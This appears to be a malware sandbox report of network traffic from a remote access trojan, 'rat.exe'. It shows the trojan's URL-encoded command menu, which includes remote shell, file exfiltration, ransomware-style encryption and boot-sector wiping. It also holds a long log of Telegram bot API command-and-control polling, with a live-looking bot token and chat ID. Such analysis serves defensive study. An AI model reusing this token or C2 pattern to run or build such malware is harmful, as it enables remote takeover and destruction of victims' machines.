CloseCD%0A%0A%F0%9F%92%BC%20FILES:%0A%20/DownloadFile%20%3Cfile/dir%3E%0A%20/UploadFile%20%3Cdrop/url%3E%0A%20/RunFile%20%3Cfile%3E%0A%20/RunFileAdmin%20%3Cfile%3E%0A%20/ListFiles%20%3Cdir%3E%0A%20/RemoveFile%20%3Cfile%3E%0A%20/RemoveDir%20%3Cdir%3E%0A%20/MoveFile%20%3Cfilr%3E%20%3Cfile%3E%0A%20/CopyFile%20%3Cfile%3E%20%3Cfile%3E%0A%20/MoveDir%20%3Cdir%3E%20%3Cdir%3E%0A%20/CopyDir%20%3Cdir%3E%20%3Cdir%3E%0A%0A%F0%9F%9A%80%20COMMUNICATION:%0A%20/Speak%20%3Ctext%3E%0A%20/Shell%20%3Ccommand%3E%0A%20/MessageBox%20%3Cerror/info/warn%3E%20%3Ctext%3E%0A%20/OpenURL%20%3Curl%3E%0A%20/SetWallpaper%20%3Cfile%3E%0A%20/SendKeyPress%20%3Ckeys%3E%0A%20/NetDiscover%20%3Cto%3E%0A%20/Uninstall%0A%0A%F0%9F%94%8A%20AUDIO:%20%0A%20/PlayMusic%20%3Cfile%3E%0A%20/AudioVolumeSet%20%3C0-100%3E%0A%20/AudioVolumeGet%0A%0A%F0%9F%92%A3%20EVIL:%0A%20/BlockInput%20%3Cseconds%3E%0A%20/Monitor%20%3Con/off/standby%3E%0A%20/DisplayRotate%20%3C0,90,180,270%3E%0A%20/EncryptFileSystem%20%3Cpassword%3E%0A%20/DecryptFileSystem%20%3Cpassword%3E%0A%20/ForkBomb%0A%20/BSoD%0A%20/OverwriteBootSector%0A%0A%F0%9F%92%A1%20POWER:%0A%20/Shutdown%0A%20/Reboot%0A%20/Hibernate%0A%20/Logoff%0A%0A%F0%9F%92%B0%20OTHER:%0A%20/Help%0A%20/About

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506642

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506643

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%93%9A%20URL%20opened

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506643

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%9A%A7%20Keyboard%20and%20mouse%20locked%20for%206%20seconds

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%9A%A7%20Keyboard%20and%20mouse%20are%20now%20unlocked

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506670

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506671

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506672

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506673

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506674

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506675

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506676

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506677

HTTP Response

200
142.250.200.14:443

https://www.youtube.com/s/desktop/b5305900/cssbin/www-main-desktop-watch-page-skeleton.css

tls, http2

msedge.exe

50.3kB
2.1MB
1032
1549

HTTP Request

GET https://www.youtube.com/

HTTP Request

GET https://www.youtube.com/s/_/ytmainappweb/_/js/k=ytmainappweb.kevlar_base.en_US.kRiB51x5Wcg.es5.O/d=0/br=1/rs=AGKMywF7t5Fisb8Mh0y29Rcj07oeutDZdw

HTTP Request

GET https://www.youtube.com/s/desktop/b5305900/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js

HTTP Request

GET https://www.youtube.com/s/desktop/b5305900/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js

HTTP Request

GET https://www.youtube.com/s/desktop/b5305900/jsbin/webcomponents-sd.vflset/webcomponents-sd.js

HTTP Request

GET https://www.youtube.com/s/desktop/b5305900/jsbin/intersection-observer.min.vflset/intersection-observer.min.js

HTTP Request

GET https://www.youtube.com/s/desktop/b5305900/jsbin/scheduler.vflset/scheduler.js

HTTP Request

GET https://www.youtube.com/s/desktop/b5305900/cssbin/www-main-desktop-home-page-skeleton.css

HTTP Request

GET https://www.youtube.com/s/desktop/b5305900/cssbin/www-onepick.css

HTTP Request

GET https://www.youtube.com/s/desktop/b5305900/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js

HTTP Request

GET https://www.youtube.com/s/desktop/b5305900/jsbin/www-tampering.vflset/www-tampering.js

HTTP Request

GET https://www.youtube.com/s/desktop/b5305900/jsbin/spf.vflset/spf.js

HTTP Request

GET https://www.youtube.com/s/desktop/b5305900/jsbin/network.vflset/network.js

HTTP Request

GET https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.7hiJwkXlKs8.L.B1.O/am=AABBAg/d=0/br=1/rs=AGKMywGGJrddI2OdqQpm3Rz8uCoVK9lqTQ

HTTP Request

GET https://www.youtube.com/s/desktop/b5305900/cssbin/www-main-desktop-watch-page-skeleton.css
142.250.200.22:443

https://i.ytimg.com/generate_204

tls, http2

msedge.exe

1.6kB
6.2kB
12
10

HTTP Request

GET https://i.ytimg.com/generate_204
142.251.173.84:443

https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en

tls, http2

msedge.exe

2.0kB
7.4kB
15
15

HTTP Request

GET https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en
142.250.187.196:443

https://www.google.com/js/th/WuArCo6uiOC32QOIiNWeSH9h2H5vf_jv_ihZ0ZQebSo.js

tls, http2

msedge.exe

2.5kB
28.5kB
29
29

HTTP Request

GET https://www.google.com/js/th/WuArCo6uiOC32QOIiNWeSH9h2H5vf_jv_ihZ0ZQebSo.js
216.58.213.14:443

https://youtube.com/

tls, http2

msedge.exe

1.8kB
9.4kB
14
16

HTTP Request

GET https://youtube.com/
142.250.179.238:443

https://play.google.com/log?format=json&hasfast=true&authuser=0

tls, http2

msedge.exe

1.7kB
8.3kB
14
15

HTTP Request

OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
216.58.212.234:443

https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create

tls, http2

msedge.exe

1.7kB
6.7kB
13
15

HTTP Request

OPTIONS https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create
149.154.167.220:443

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661

tls, http

rat.exe

26.6kB
57.9kB
222
121

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506678

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506679

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506680

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506681

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506682

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506683

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506684

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506685

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506686

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506687

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506688

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506689

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506690

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506691

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506692

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506693

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506694

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506695

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506696

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506697

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506698

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506699

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506700

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506701

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506702

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506703

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506704

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506705

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506706

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506707

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506708

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506709

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506710

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506711

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%93%84%20Downloading%20file%20%22file%22%20from%20url

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%92%A5%20Connection%20error

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669

HTTP Response

200

HTTP Request

